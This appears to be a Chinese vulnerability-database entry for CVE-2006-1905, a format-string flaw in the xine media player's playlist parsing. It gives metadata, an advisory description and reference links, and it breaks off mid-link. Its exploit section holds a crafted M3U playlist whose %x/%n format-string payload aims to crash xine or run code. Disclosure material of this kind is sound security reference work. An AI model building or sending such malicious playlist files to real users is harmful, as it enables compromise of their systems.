Xine Playlist 格式化字符串漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110088 漏洞类型 格式化字符串
发布时间 2006-04-18 更新时间 2006-11-30
CVE编号 CVE-2006-1905 CNNVD-ID CNNVD-200604-390
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27670
https://www.securityfocus.com/bid/17579
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-390
|漏洞详情
xine0.99.3中的xiTK(xitk/main.c)存在多个格式化字符串漏洞。这使得远程攻击者可以借助于播放列表文件中EXTINFO行的长文件名中的格式化字符串说明符执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/17579/info

The xine package is reported prone to a remote format-string vulnerability. 

This issue arises when the application handles specially crafted playlist files. An attacker can exploit this vulnerability by crafting a malicious file that contains format specifiers and then sending the file to an unsuspecting user. 

A successful attack may crash the application or lead to arbitrary code execution. 

All versions of xine are considered vulnerable at the moment.

#EXTM3U
#EXTINFO !!All_You_Playlists_Are_Belong_To_Us - SHHEEEELLLLCCCCOOOOOODDDDDDEEEEEEEEEEE!!
AAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.13068u%n%hn
|受影响的产品
xine xine 1.0.1 xine xine 1.0 xine xine 0.9.18 + S.u.S.E. Linux Personal 8.2 xine xine 0.9.13 xine xine 0.9.8
|参考资料

来源:BID
名称:17579
链接:http://www.securityfocus.com/bid/17579
来源:BUGTRAQ
名称:20060418RemoteXineFormatStringVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/431251/100/0/threaded
来源:XF
名称:xine-playlist-format-string(25851)
链接:http://xforce.iss.net/xforce/xfdb/25851
来源:OSVDB
名称:24747
链接:http://www.osvdb.org/24747
来源:SUSE
名称:SUSE-SA:2006:025
链接:http://www.novell.com/linux/security/advisories/2006_05_05.html
来源:MANDRIVA
名称:MDKSA-2006:085
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:085
来源:GENTOO
名称:GLSA-200604-15
链接:http://www.gentoo.org/security/en/glsa/glsa-200604-15.xml
来源:VUPEN
名称:ADV-2006-1432
链接:http://www.frsirt.com/english/advisories/2006/1432
来源:sourceforge.net
链接:http://sourceforge.net/mailarchive/message.php?msg_id=15429845
来源:SECTRACK
名称:1015959
链接:http://securitytracker.com/id?1015959
来源:SECUNIA
名称:20066
链接:http://secunia.com/advisories/20066
来源:SECUNIA
名称:19854
链接:http://secunia.com/advisories/19854
来源:SECUNIA
名称:19671
链接:http://secunia.com/advi